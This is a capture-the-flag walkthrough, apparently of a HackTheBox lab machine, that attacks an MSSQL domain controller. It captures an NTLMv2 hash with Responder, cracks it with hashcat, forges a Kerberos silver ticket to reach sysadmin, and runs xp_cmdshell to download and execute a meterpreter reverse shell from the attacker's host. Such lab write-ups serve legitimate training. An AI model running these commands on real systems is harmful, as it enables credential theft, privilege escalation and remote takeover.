User Flag

nmap finds only MSSQL listening:

```
PORT     STATE SERVICE  REASON          VERSION
1433/tcp open  ms-sql-s syn-ack ttl 127 Microsoft SQL Server 16.00.1000.00
| ms-sql-ntlm-info:
|   Target_Name: SIGNED
|   NetBIOS_Domain_Name: SIGNED
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: SIGNED.HTB
|   DNS_Computer_Name: DC01.SIGNED.HTB
|   DNS_Tree_Name: SIGNED.HTB
|_  Product_Version: 10.0.17763

Host script results:
|_clock-skew: mean: -14s, deviation: 0s, median: -14s
| ms-sql-info:
|   10.10.11.90:1433:
|     Version:
|       name: Microsoft SQL Server
|       number: 16.00.1000.00
|       Product: Microsoft SQL Server
|_    TCP port: 1433
```
Cracking the service account's NTLMv2 hash

After connecting to MSSQL, enumeration turns up nothing useful, so the next step is to capture the service account's NTLMv2 hash and try to crack it. `xp_dirtree` pointed at a UNC path makes the SQL Server service account authenticate to our host:

```
$ mssqlclient.py scott:'Sm230#C5NatH'@10.10.11.90
SQL (scott  guest@master)> xp_dirtree \\10.10.16.8\aa
```
responder

```
responder -I tun0
[SMB] NTLMv2-SSP Client   : 10.10.11.90
[SMB] NTLMv2-SSP Username : SIGNED\mssqlsvc
[SMB] NTLMv2-SSP Hash     : mssqlsvc::SIGNED:4d6bf6cb6850bfc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
```
Cracking yields the credentials mssqlsvc:purPLE9795!@

```
$ echo 'mssqlsvc::SIGNED:4d6bf6cb6850bfc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' > hash.txt
$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

MSSQLSVC::SIGNED:4d6bf6cb6850bfc3:be31c2f9e6a51a64929b487b21d5f76f:010100000000000080973e28da3cdc01b33b5d065f0d6096000000000200080036004c004700300001001e00570049004e002d005800540049003200460046004e004c0037004f00340004003400570049004e002d005800540049003200460046004e004c0037004f0034002e0036004c00470030002e004c004f00430041004c000300140036004c00470030002e004c004f00430041004c000500140036004c00470030002e004c004f00430041004c000700080080973e28da3cdc0106000400020000000800300030000000000000000000000000300000e9cc67a8cde177e34715c3e8acdb744288ed7d2634a916315e65723ace8336430a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0038000000000000000000:purPLE9795!@

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: MSSQLSVC::SIGNED:4d6bf6cb6850bfc3:be31c2f9e6a51a649...000000
Time.Started.....: Tue Oct 14 17:04:36 2025 (1 sec)
Time.Estimated...: Tue Oct 14 17:04:37 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  4452.2 kH/s (1.11ms) @ Accel:512 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4489216/14344385 (31.30%)
Rejected.........: 0/4489216 (0.00%)
Restore.Point....: 4472832/14344385 (31.18%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: pwood8 -> punong
```
Log in as mssqlsvc

```
mssqlclient.py mssqlsvc:'purPLE9795!@'@10.10.11.90 -windows-auth
```
Enumerating logins shows that the SIGNED\IT group has been granted sysadmin, but the current login still does not have sysadmin rights:

```
SQL (SIGNED\mssqlsvc  guest@master)> enum_logins
name                                type_desc       is_disabled   sysadmin   securityadmin   serveradmin   setupadmin   processadmin   diskadmin   dbcreator   bulkadmin
---------------------------------   -------------   -----------   --------   -------------   -----------   ----------   ------------   ---------   ---------   ---------
sa                                  SQL_LOGIN       0             1          0               0             0            0              0           0           0
##MS_PolicyEventProcessingLogin##   SQL_LOGIN       1             0          0               0             0            0              0           0           0
##MS_PolicyTsqlExecutionLogin##     SQL_LOGIN       1             0          0               0             0            0              0           0           0
SIGNED\IT                           WINDOWS_GROUP   0             1          0               0             0            0              0           0           0
NT SERVICE\SQLWriter                WINDOWS_LOGIN   0             1          0               0             0            0              0           0           0
NT SERVICE\Winmgmt                  WINDOWS_LOGIN   0             1          0               0             0            0              0           0           0
NT SERVICE\MSSQLSERVER              WINDOWS_LOGIN   0             1          0               0             0            0              0           0           0
NT AUTHORITY\SYSTEM                 WINDOWS_LOGIN   0             0          0               0             0            0              0           0           0
NT SERVICE\SQLSERVERAGENT           WINDOWS_LOGIN   0             1          0               0             0            0              0           0           0
NT SERVICE\SQLTELEMETRY             WINDOWS_LOGIN   0             0          0               0             0            0              0           0           0
scott                               SQL_LOGIN       0             0          0               0             0            0              0           0           0
SIGNED\Domain Users                 WINDOWS_GROUP   0             0          0               0             0            0              0           0           0
```
Silver ticket

Since the service account's NT hash is known, a silver ticket for the MSSQL SPN can carry the SIGNED\IT group in its PAC and so obtain that group's sysadmin rights.

First gather the required values: the domain SID is S-1-5-21-4088429403-1159899800-2753317549, the RID of SIGNED\mssqlsvc is 1103, and the RID of SIGNED\IT is 1105. Both can be read out of the binary SIDs SQL Server returns (the last little-endian DWORD is the RID):

```
SQL (SIGNED\mssqlsvc  guest@master)> SELECT SUSER_SID();
b'0105000000000005150000005b7bb0f398aa2245ad4a1ca44f040000'

SQL (SIGNED\Administrator  guest@master)> SELECT name, sid FROM sys.server_principals
SIGNED\IT   b'0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000'
```
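To show how the domain SID and the two RIDs above are read out of those binary values, here is an added Python decoder (not part of the original writeup) for the SID layout that `SUSER_SID()` and `sys.server_principals.sid` return; the two hex blobs it decodes are the ones quoted in the SQL output above, and the same routine is useful when auditing which domain principals hold server roles.

```python
import struct


def decode_sid(blob: bytes) -> str:
    """Decode a binary Windows SID into its 'S-1-5-21-...' string form.

    Layout: revision (1 byte), sub-authority count (1 byte),
    identifier authority (6 bytes, big-endian), then N little-endian
    32-bit sub-authorities. For a domain principal the last one is the RID.
    """
    if len(blob) < 8:
        raise ValueError("SID blob too short")
    revision, sub_count = blob[0], blob[1]
    if revision != 1:
        raise ValueError(f"unsupported SID revision {revision}")
    if len(blob) != 8 + 4 * sub_count:
        raise ValueError("SID length does not match sub-authority count")
    authority = int.from_bytes(blob[2:8], "big")
    subs = struct.unpack(f"<{sub_count}I", blob[8:])
    return "S-" + "-".join(str(v) for v in (revision, authority, *subs))


def split_domain_rid(sid: str) -> tuple:
    """Split 'S-1-5-21-<d1>-<d2>-<d3>-<rid>' into (domain SID, RID).

    Only NT-authority (5) domain SIDs (first sub-authority 21) carry a RID;
    well-known SIDs such as S-1-5-18 are rejected rather than mis-split.
    """
    parts = sid.split("-")
    if len(parts) < 5 or parts[2] != "5" or parts[3] != "21":
        raise ValueError(f"not a domain SID: {sid}")
    return "-".join(parts[:-1]), int(parts[-1])


# The two SID values quoted in the SQL output above (taken from the page).
PAGE_SIDS = {
    "SIGNED\\mssqlsvc": "0105000000000005150000005b7bb0f398aa2245ad4a1ca44f040000",
    "SIGNED\\IT":       "0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000",
}


def resolve_page_sids() -> dict:
    """Return {principal: (domain SID, RID)} for the values above."""
    return {name: split_domain_rid(decode_sid(bytes.fromhex(h)))
            for name, h in PAGE_SIDS.items()}


if __name__ == "__main__":
    for name, (domain, rid) in resolve_page_sids().items():
        print(f"{name}: domain={domain} rid={rid}")
```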
Forge the silver ticket. The NT hash is the MD4 of the UTF-16LE password; ticketer.py then builds a TGS for the MSSQL SPN with group RID 1105 in the PAC:

```
$ echo -n "purPLE9795!@" | iconv -t utf-16le | openssl dgst -md4 -provider legacy -provider default
MD4(stdin)= ef699384c3285c54128a3ee1ddb1a0cc
$ ticketer.py -nthash 'ef699384c3285c54128a3ee1ddb1a0cc' -domain-sid 'S-1-5-21-4088429403-1159899800-2753317549' -domain 'SIGNED.HTB' -spn 'MSSQLSvc/DC01.SIGNED.HTB:1433' -group 1105 administrator
$ export KRB5CCNAME=administrator.ccache
$ mssqlclient.py -k -no-pass SIGNED.HTB/administrator@dc01.signed.htb
```
Get the flag

```
SQL (SIGNED\Administrator  dbo@master)> xp_cmdshell type c:\users\mssqlsvc\desktop\user.txt
output
--------------------------------
d4bc58d4d3038cf6b23d4ff31363191c
```
Root Flag

Generate a payload and upload it:

```
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.16.8 LPORT=4444 -f exe -o met.exe
SQL (SIGNED\Administrator  dbo@master)> xp_cmdshell curl 10.10.16.8:8000/met.exe -o %temp%\l1nk.exe
SQL (SIGNED\Administrator  dbo@master)> xp_cmdshell %temp%\l1nk.exe
```
Unintended route

```
ticketer.py -nthash 'ef699384c3285c54128a3ee1ddb1a0cc' -domain-sid 'S-1-5-21-4088429403-1159899800-2753317549' -domain 'SIGNED.HTB' -spn 'MSSQLSvc/DC01.SIGNED.HTB:1433' -group 1105,512 -user-id 1103 administrator
```

Read the file

```
SQL (SIGNED\mssqlsvc  dbo@master)> SELECT * FROM OPENROWSET(BULK N'C:/users/administrator/desktop/root.txt', SINGLE_CLOB) AS Contents
BulkColumn
---------------------------------------
b'f2c65328837e4bf21e4c171dad2b60d0\r\n'
```